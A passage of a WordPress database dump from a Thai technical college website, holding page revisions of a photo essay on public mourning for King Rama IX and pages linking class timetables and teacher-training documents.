/>หญิงชาวอิวเมี่ยน (เมี่ยน) ในชุดแต่งกายประจํากลุ่มชาติพันธุ์ที่โดดเด่นด้วยผ้าโพกศีรษะขนาดใหญ่สีดํากับลวดลายที่วิจิตรบรรจงตรงด้านบนศีรษะและไหมพรมสีแดงอ่อนที่พันอยู่รอบคอที่ดูตัดกับเสื้อผ้าสีดําอย่างโดดเด่นกําลังนั่งรอเข้ากราบพระบรมศพในหลวงรัชกาลที่ 9 ในบริเวณพระบรมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4337 size-large\" src=\"/wp-content/uploads/2018/11/76-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ด้วยความไร้เดียงสา\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4338 size-large\" src=\"/wp-content/uploads/2018/11/77-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เด็ก ๆ ตื่นเต้นกับการได้จุดเทียนและร้องเพลงสรรเสริญพระบารมี ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ บริเวณริมแม่นํ้าแม่กลอง จังหวัดราชบุรี</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ประสานเสียง”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4339 size-large\" src=\"/wp-content/uploads/2018/11/81-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />นักเรียนระดับอนุบาลร้องเพลงประสานเสียง “ลูกของพ่อ” และ “พระราชาในนิทาน” ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ สนามกีฬาไอโมบาย จังหวัดบุรีรัมย์</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ณ กําแพงบ้านพ่อ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4340 size-large\" src=\"/wp-content/uploads/2018/11/91-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>', 'ภาพถ่าย โดย อรุณ ร้อยศรี', '', 'inherit', 'closed', 'closed', '', '4341-revision-v1', '', '', '2018-11-12 15:04:22', '2018-11-12 08:04:22', '', 4341, 'http://www.technicrayong.ac.th/4341-revision-v1/', 0, 'revision', '', 0),
(4404, 4, '2018-11-12 15:06:10', '2018-11-12 08:06:10', '<h3><span style=\"color: #993366;\">ตารางสอนครู</span></h3>\r\n<a href=\"https://drive.google.com/open?id=1wFlgoyeoS1Pg-zSFQB0W7cjDuALXZwMR\">ปีการศึกษา 1/2560 </a>\r\n\r\n<a href=\"https://drive.google.com/drive/folders/1s5ZqbV0gwdItaOdkYYP3lDPxM3v28r9D?usp=sharing\">ปีการศึกษา 2/2560 </a>\r\n\r\n<a href=\"https://drive.google.com/drive/folders/1edMX3D9uKF7qxQXyo1e8KOtKSceRl8DJ?usp=sharing\">ปีการศึกษา 1/2561</a>\r\n\r\nปีการศึกษา 2/2561\r\n\r\n \r\n<h3><span style=\"color: #993366;\">ตารางเรียนนักเรียน-นักศึกษา</span></h3>\r\nปีการศึกษา 1/2560\r\n\r\nปีการศึกษา 2/2560\r\n\r\n<a href=\"https://drive.google.com/open?id=1k2WwLZlgy4YK8X6AnrNc_6iqkPYW87Ub\">ปีการศึกษา 1/2561</a>\r\n\r\nปีการศึกษา 2/2561', 'ตารางเรียน-ตารางสอน', '', 'inherit', 'closed', 'closed', '', '1174-revision-v1', '', '', '2018-11-12 15:06:10', '2018-11-12 08:06:10', '', 1174, 'http://www.technicrayong.ac.th/1174-revision-v1/', 0, 'revision', '', 0),
(4405, 3, '2018-11-12 15:06:27', '2018-11-12 08:06:27', '<h3 style=\"text-align: center;\"><span class=\"fontstyle0\" style=\"color: #993300;\">“พิธีจุดเทียนถวายความอาลัยและสวดมนต์ข้ามปี ของชาวเมืองบุรีรัมย์”</span></h3>\r\n<img class=\"wp-image-4313 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/2-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระภิกษุชาวเมืองบุรีรัมย์และจังหวัดใกล้เคียงร่วมกันทําพิธีสวดมนต์ข้ามปี เนื่องในวันสิ้นปี และถวายความอาลัยแด่ในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ภาพจากพลังความตั้งใจ”</span></h3>\r\n<img class=\"wp-image-4314 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/3-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เพื่อประชาชนด้วยพระหัตถ์ของพระองค์เอง”</span></h3>\r\n<img class=\"wp-image-4315 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/4-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระเจ้าวรวงศ์เธอ พระองค์เจ้าโสมสวลี พระวรราชาทินัดดามาตุ ทรงประกอบอาหารด้วยพระองค์เองเพื่อประทานแก่ประชาชนที่เข้ามากราบพระบรมศพในหลวงรัชกาลที่ 9 ณ บริเวณท้องสนามหลวง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“พิธีสวดมิสซา”</span></h3>\r\n<p style=\"text-align: center;\"><img class=\"wp-image-4316 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/12-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />การสวดมิสซาในโบสถ์อัสสัมชัญบางรัก กรุงเทพฯ เพื่อแสดงการไว้อาลัยต่อการจากไปของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“การปฏิบัติงานของเจ้าหน้าที่”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4317\" src=\"/wp-content/uploads/2018/11/17-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">เจ้าหน้าที่ตํารวจปฏิบัติหน้าที่บริเวณถนนหน้าพระลาน เพื่อจัดระเบียบและอํานวยความสะดวกแก่ประชาชนที่เข้ามาร่วมถวายสักการะพระบรมศพในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“แต่งดํา ทั้งเมือง”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4318\" src=\"/wp-content/uploads/2018/11/21-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">บรรยากาศการไว้อาลัยแด่ในหลวงรัชกาลที่ 9 ณ สถานีรถไฟฟ้ า BTS สยาม</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ชาวมอญ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4319 size-large\" src=\"/wp-content/uploads/2018/11/23-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนที่มาถวายความอาลัยในหลวงรัชกาลที่ 9 ณ พระบรมหาราชวัง มักแต่งกายด้วยเสื้อผ้าสีดําเป็นหลัก แต่มีพสกนิกรอีกจํานวนไม่น้อย โดยเฉพาะกลุ่มชาติพันธุ์ต่าง ๆ ที่เลือกใส่เสื้อผ้าอาภรณ์อันเป็นเอกลักษณ์ ของกลุ่มตนเองมาถวายความอาลัยแทนเสื้อผ้าสีดํา เช่น ชาวไทยเชื้อสายมอญจากอําเภอสังขละบุรี จังหวัดกาญจนบุรีที่มากราบสักการะพระบรมศพในหลวงรัชกาลที่ 9 ในชุดแต่งกายประจําถิ่น</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เก็บไว้ในความทรงจํา”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4320 size-large\" src=\"/wp-content/uploads/2018/11/24-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />นอกจากจุดเทียนและวางดอกไม้เพื่อแสดงความอาลัย ณ บริเวณกําแพงด้านหน้าพระบรมมหาราชวังแล้ว ประชาชนจํานวนมากยังได้ซื้อหาพระบรมสาทิสลักษณ์ และพระบรมฉายาลักษณ์ที่พ่อค้าแม่ค้าจํานวนมากมาจําหน่ายเพื่อเก็บไว้เป็นความทรงจํา</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4321 size-large\" src=\"/wp-content/uploads/2018/11/27-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึก จุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐานพระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ครอบครัวพาสมาชิกตัวน้อยมาร่วมวางดอกไม้ ณ ริมกํา แพงพระบรมมหาราชวัง\"</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4322\" src=\"/wp-content/uploads/2018/11/32-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">เพื่อแสดงความอาลัยต่อการเสด็จสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช และร่วมเป็นส่วนหนึ่งในช่วงเวลาที่สําคัญที่สุดของคนไทยทั้งประเทศ</p>\r\n<img class=\"aligncenter size-large wp-image-4323\" src=\"/wp-content/uploads/2018/11/37-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “ข้างกําแพงวัง”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4324\" src=\"/wp-content/uploads/2018/11/38-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ในวันที่พ่อจากไป...”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4325\" src=\"/wp-content/uploads/2018/11/42-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">ศูนย์การค้าแห่งหนึ่งจัดงานรําลึกและจุดเทียนถวายความอาลัยแด่ในหลวงรัชกาลที่ 9 ซึ่งในงานมีการแจกภาพในหลวงและลงนามถวายความอาลัย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“กราบรําลึกถึงพระองค์”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4326 size-large\" src=\"/wp-content/uploads/2018/11/43-Arun-Roysri-copy-1024x576.jpg\" alt=\"\" width=\"640\" height=\"360\" />ราว 2 ทุ่ม ของวันพฤหัสบดีที่ 27 ตุลาคม พ.ศ. 2559 ชาวโพธาราม จังหวัดราชบุรีและอําเภอใกล้เคียง ได้มารวมตัวกันจุดเทียนสีขาว ร้องเพลงสรรเสริญพระบารมี และกราบพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ณ บริเวณหาดทรายโพธารามริมแม่นํ้าแม่กลอง ด้วยความอาลัยและรําลึกถึงพระมหากรุณาธิคุณของพระองค์</p>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4327 size-large\" src=\"/wp-content/uploads/2018/11/54-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เฝ้ารอ...”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4328 size-large\" src=\"/wp-content/uploads/2018/11/55-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนตลอดสองฝั่งถนนรอรับขบวนเสด็จพระบรมวงศานุวงศ์ ที่เสด็จมาประกอบพิธีทางศาสนา เมื่อเสร็จพิธีเจ้าหน้าที่จะอนุญาตให้ประชาชน\r\nเข้าไปวางดอกไม้และจุดเทียนรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><span style=\"color: #993300;\">“เสียงประสานจากใจ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4329 size-large\" src=\"/wp-content/uploads/2018/11/57-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนที่ร่วมกันร้องเพลงสรรเสริญพระบารมีและจุดเทียนถวายความอาลัย บริเวณท้องสนามหลวงและรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4330 size-large\" src=\"/wp-content/uploads/2018/11/59-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึกจุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐาน พระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เทียนและดอกไม้แห่งการรําลึก”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4331 size-large\" src=\"/wp-content/uploads/2018/11/62-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ช่วงแรกหลังจากการสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดชประชาชนจะนําเทียนและดอกไม้มากราบไหว้ เพื่อเป็นการแสดงความอาลัยต่อพระองค์ทุกคนต่างมาด้วยความรู้สึกโศกเศร้าเสียใจอย่างสุดซึ้ง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“สวดมนต์ ภาวนา”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4332 size-large\" src=\"/wp-content/uploads/2018/11/64-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />แม่ชีและนักศึกษาร่วมกันนั่งสวดมนต์ภาวนา เพื่อถวายเป็นพระราชกุศลแด่ในหลวงรัชกาลที่ 9 ณ ท้องสนามหลวง</p>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4333 size-large\" src=\"/wp-content/uploads/2018/11/70-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ตามรอยเส้นทางพระราชดําเนิน”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4334 size-large\" src=\"/wp-content/uploads/2018/11/72-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เจริญ นักรบไพร ชาวบ้านหมู่บ้านห้วยห้อม จังหวัดแม่ฮ่องสอน ถือพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ขณะเสด็จพระราชทานฝูงแกะในพื้นที่หมู่บ้านห้วยห้อมแก่ประชาชน และต่อมาพระองค์ได้ริเริ่มโครงการพระราชดําริ อันส่งผลให้ชาวบ้านห้วยห้อมมีชีวิตความเป็นอยู่ที่ดีขึ้น</p>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4335 size-large\" src=\"/wp-content/uploads/2018/11/73-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ในวันที่ 11 ธันวาคม พ.ศ. 2559 กลุ่มชาติพันธุ์ที่อาศัยอยู่ในจังหวัดทางภาคเหนือและภาคตะวันออกเฉียงเหนือ จํานวน 41 กลุ่ม พร้อมใจเดินทางมายังพระบรมมหาราชวัง เพื่อมาถวายสักการะพระบรมศพพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช เบื้องหน้าพระบรมโกศ ณ พระที่นั่งดุสิตมหาปราสาท พร้อมทั้งประกอบพิธีส่งดวงพระวิญญาณของในหลวงรัชกาลที่ 9 ตามแบบแผนประเพณีของแต่ละกลุ่มชาติพันธุ์ด้วย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ครั้งหนึ่งในชีวิต”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4336 size-large\" src=\"/wp-content/uploads/2018/11/74-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />หญิงชาวอิวเมี่ยน (เมี่ยน) ในชุดแต่งกายประจํากลุ่มชาติพันธุ์ที่โดดเด่นด้วยผ้าโพกศีรษะขนาดใหญ่สีดํากับลวดลายที่วิจิตรบรรจงตรงด้านบนศีรษะและไหมพรมสีแดงอ่อนที่พันอยู่รอบคอที่ดูตัดกับเสื้อผ้าสีดําอย่างโดดเด่นกําลังนั่งรอเข้ากราบพระบรมศพในหลวงรัชกาลที่ 9 ในบริเวณพระบรมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4337 size-large\" src=\"/wp-content/uploads/2018/11/76-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ด้วยความไร้เดียงสา\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4338 size-large\" src=\"/wp-content/uploads/2018/11/77-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เด็ก ๆ ตื่นเต้นกับการได้จุดเทียนและร้องเพลงสรรเสริญพระบารมี ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ บริเวณริมแม่นํ้าแม่กลอง จังหวัดราชบุรี</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ประสานเสียง”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4339 size-large\" src=\"/wp-content/uploads/2018/11/81-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />นักเรียนระดับอนุบาลร้องเพลงประสานเสียง “ลูกของพ่อ” และ “พระราชาในนิทาน” ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ สนามกีฬาไอโมบาย จังหวัดบุรีรัมย์</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ณ กําแพงบ้านพ่อ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4340 size-large\" src=\"/wp-content/uploads/2018/11/91-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>', 'ภาพถ่าย โดย อรุณ ร้อยศรี', '', 'inherit', 'closed', 'closed', '', '4341-revision-v1', '', '', '2018-11-12 15:06:27', '2018-11-12 08:06:27', '', 4341, 'http://www.technicrayong.ac.th/4341-revision-v1/', 0, 'revision', '', 0),
(4406, 4, '2018-11-12 15:08:35', '2018-11-12 08:08:35', '<p style=\"padding-left: 30px;\"><span style=\"color: #800080;\"><a style=\"color: #800080;\" href=\"https://drive.google.com/open?id=1zgMqsJ1EQAf994V8G0dQLF8OidBBP5Rs\">คู่มือ ID Plan</a></span></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"https://drive.google.com/file/d/1yfr-R9TRPAKzbTqzhKwgos92gWFEhU63/view?usp=sharing\"><span style=\"color: #800080;\">คู่มือ PLC</span></a></p>\r\n<p style=\"padding-left: 30px;\"><span style=\"color: #800080;\"><a style=\"color: #800080;\" href=\"https://drive.google.com/open?id=1DUO94GAj503xoHcT_zh42s7UEZ76_Yu9\">เอกสารประกอบการบรรยายการประเมินตนเองและ ID Plan</a></span></p>\r\n<p style=\"padding-left: 30px;\"><span style=\"color: #800080;\"><a style=\"color: #800080;\" href=\"https://drive.google.com/open?id=1iEy9kHBnv7TkIEOFnr1X8FmtQ_J3Z52C\">เอกสารประกอบการบรรยาย PLC</a></span></p>\r\n<p style=\"padding-left: 30px;\"><span style=\"color: #800080;\"><a style=\"color: #800080;\" href=\"https://drive.google.com/open?id=13W0BfhXa2lokedlGTwLCq3-Tp4Ta4np0\">เอกสารประกอบการบรรยาย ว.21</a></span></p>\r\n<p style=\"padding-left: 30px;\"><span style=\"color: #800080;\"><a style=\"color: #800080;\" href=\"https://drive.google.com/open?id=1S8NUwHl1LTsPKIwiTVwvdpEqurK9ojV6\">ถาม-ตอบ เกี่ยวกับ ว.21</a></span></p>\r\n<p style=\"padding-left: 30px;\"><span style=\"color: #800080;\"><a style=\"color: #800080;\" href=\"http://bsq2.vec.go.th/document/%E0%B8%84%E0%B8%B9%E0%B9%88%E0%B8%A1%E0%B8%B7%E0%B8%AD%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%97%E0%B8%B3%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%A3%E0%B8%B9%E0%B9%89%E0%B8%A1%E0%B8%B8%E0%B9%88%E0%B8%87%E0%B9%80%E0%B8%99%E0%B9%89%E0%B8%99%E0%B8%AA%E0%B8%A1%E0%B8%A3%E0%B8%A3%E0%B8%96%E0%B8%99%E0%B8%B0%20(%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%A1%E0%B8%97%E0%B8%B5%E0%B9%88%201)/%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%A1%E0%B8%97%E0%B8%B5%E0%B9%881.rar\">คู่มือการจัดทำแผนการเรียนรู้มุ่งเน้นสมรรถนะ </a></span></p>\r\n<p style=\"padding-left: 30px;\"><span style=\"color: #800080;\"><a style=\"color: #800080;\" href=\"http://bsq2.vec.go.th/document/%E0%B8%84%E0%B8%B9%E0%B9%88%E0%B8%A1%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%82%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%A7%E0%B8%B4%E0%B8%88%E0%B8%B1%E0%B8%A2%E0%B9%80%E0%B8%9E%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%9E%E0%B8%B1%E0%B8%92%E0%B8%99%E0%B8%B2%E0%B8%84%E0%B8%B8%E0%B8%A3%E0%B8%A0%E0%B8%B2%E0%B8%9E%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%AA%E0%B8%AD%E0%B8%99%E0%B8%AD%E0%B8%B2%E0%B8%8A%E0%B8%B5%E0%B8%A7%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9%E0%B8%B2/%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%A1%E0%B8%97%E0%B8%B5%E0%B9%882.rar\">คู่มือการเขียนรายงานการวิจัย</a></span></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"https://drive.google.com/open?id=1h4nIcmATgPGm4SsrvyheCzZT457lOiRc\">ว.21</a></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"https://drive.google.com/open?id=1sGN5LP53gIappo8Oc-j7Y7zpus4UUxpj\">ว.22</a></p>\r\n เอกสารอบรม PLC 10-11 พฤศจิกายน 2561', 'เอกสารพัฒนาการเรียนการสอน', '', 'inherit', 'closed', 'closed', '', '2169-revision-v1', '', '', '2018-11-12 15:08:35', '2018-11-12 08:08:35', '', 2169, 'http://www.technicrayong.ac.th/2169-revision-v1/', 0, 'revision', '', 0),
(4407, 4, '2018-11-12 15:10:46', '2018-11-12 08:10:46', '<p style=\"padding-left: 30px;\"><span style=\"color: #800080;\"><a style=\"color: #800080;\" href=\"https://drive.google.com/open?id=1zgMqsJ1EQAf994V8G0dQLF8OidBBP5Rs\">คู่มือ ID Plan</a></span></p>\r\n<p style=\"padding-left: 30px;\"><a href=\"https://drive.google.com/file/d/1yfr-R9TRPAKzbTqzhKwgos92gWFEhU63/view?usp=sharing\"><span style=\"color: #800080;\">คู่มือ PLC</span></a></p>\r\n<p style=\"padding-left: 30px;\"><span style=\"color: #800080;\"><a style=\"color: #800080;\" href=\"https://drive.google.com/open?id=1DUO94GAj503xoHcT_zh42s7UEZ76_Yu9\">เอกสารประกอบการบรรยายการประเมินตนเองและ ID Plan</a></span></p>\r\n<p style=\"padding-left: 30px;\"><span style=\"color: #800080;\"><a style=\"color: #800080;\" href=\"https://drive.google.com/open?id=1iEy9kHBnv7TkIEOFnr1X8FmtQ_J3Z52C\">เอกสารประกอบการบรรยาย PLC</a></span></p>\r\n<p style=\"padding-left: 30px;\"><span style=\"color: #800080;\"><a style=\"color: #800080;\" href=\"https://drive.google.com/open?id=13W0BfhXa2lokedlGTwLCq3-Tp4Ta4np0\">เอกสารประกอบการบรรยาย ว.21</a></span></p>\r\n<p style=\"padding-left: 30px;\"><span style=\"color: #800080;\"><a style=\"color: #800080;\" href=\"https://drive.google.com/open?id=1S8NUwHl1LTsPKIwiTVwvdpEqurK9ojV6\">ถาม-ตอบ เกี่ยวกับ ว.21</a></span></p>\r\n<p style=\"padding-left: 30px;\"><span style=\"color: #800080;\"><a style=\"color: #800080;\" href=\"http://bsq2.vec.go.th/document/%E0%B8%84%E0%B8%B9%E0%B9%88%E0%B8%A1%E0%B8%B7%E0%B8%AD%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%97%E0%B8%B3%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99%E0%B8%A3%E0%B8%B9%E0%B9%89%E0%B8%A1%E0%B8%B8%E0%B9%88%E0%B8%87%E0%B9%80%E0%B8%99%E0%B9%89%E0%B8%99%E0%B8%AA%E0%B8%A1%E0%B8%A3%E0%B8%A3%E0%B8%96%E0%B8%99%E0%B8%B0%20(%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%A1%E0%B8%97%E0%B8%B5%E0%B9%88%201)/%E0%B9%80%E0%B8%A5%E0%B9%88%E0%B8%A1%E0%B8%97%E0%B8%B5%E0%B9%881.rar\">คู่มือการจัดทำแผนการเรียนรู้มุ่งเน้นสมรรถนะ </a></span></p>\r\n<p 